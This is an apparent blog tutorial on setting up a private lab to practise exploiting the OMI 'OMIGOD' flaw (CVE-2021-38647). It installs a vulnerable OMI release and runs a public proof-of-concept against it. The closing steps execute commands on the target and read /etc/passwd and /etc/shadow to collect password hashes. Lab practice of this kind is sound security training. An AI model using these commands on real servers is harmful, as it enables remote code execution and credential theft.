Creating your own private pwn lab for OMI Exploitation

First off huge thanks to IPPSEC for posting this video and doing the heavy work when I started looking into making a private OMI Exploitation lab without hosting it on azure.

At first I ran into SSL issues with the OMI install followed by namespace issues with the SOAP requests with the exploit POC I was using. So to make things very simple I documented out everything you need to make your own private OMI pwn lab.

Step 1: Download Ubuntu Server 20.04.3

https://releases.ubuntu.com/20.04.3/ubuntu-20.04.3-live-server-amd64.iso?_ga=2.2206325.472762709.1631937347-1424207465.1631937347

Step 2: Download the following package links with wget directly to the server

wget https://github.com/microsoft/omi/releases/download/v1.6.8-0/omi-1.6.8-0.ssl_110.ulinux.x64.deb

wget https://github.com/microsoft/SCXcore/releases/download/v1.6.8-1/scx-1.6.8-1.ssl_110.ulinux.x64.deb

Step 3: Install vulnerable OMI release onto ubuntu server

sudo dpkg -i omi-1.6.8–0.ssl_110.ulinux.x64.deb

Step 4: Modify omiserver.conf on ubuntu server to listen on port 5986 for https

cd /etc/opt/omi/conf

sudo nano omiserver.conf

Once you update the saved file restart the omi services by issuing the following command:

sudo service omid restart

Step 5: Install the SCX Core package on the ubuntu server. This will fix the runspace issues encountered running the OMIGOD exploit POC

sudo dpkg -i scx-1.6.8–1.ssl_110.ulinux.x64.deb

Step 6: Download OMIGOD exploit POC (on Your hacking box such as Kali)

git clone https://github.com/horizon3ai/CVE-2021-38647

Once the package is cloned you should be able to run the following example command to see what ID the exploit runs as when you target the vulnerable ubuntu server (replace IP with your ubuntu server vulnerable IP):

python3 omigod.py -t 10.0.0.5 -c id

Example:

At this point you can play around with other commands for reconnaissance or exploitation such as:

Gathering users:

python3 omigod.py -t 10.0.0.5 -c ‘cat /etc/passwd’

Getting password hashes:

python3 omigod.py -t 10.0.0.5 -c ‘cat /etc/shadow’

There are really lots of possibilities here to play around with.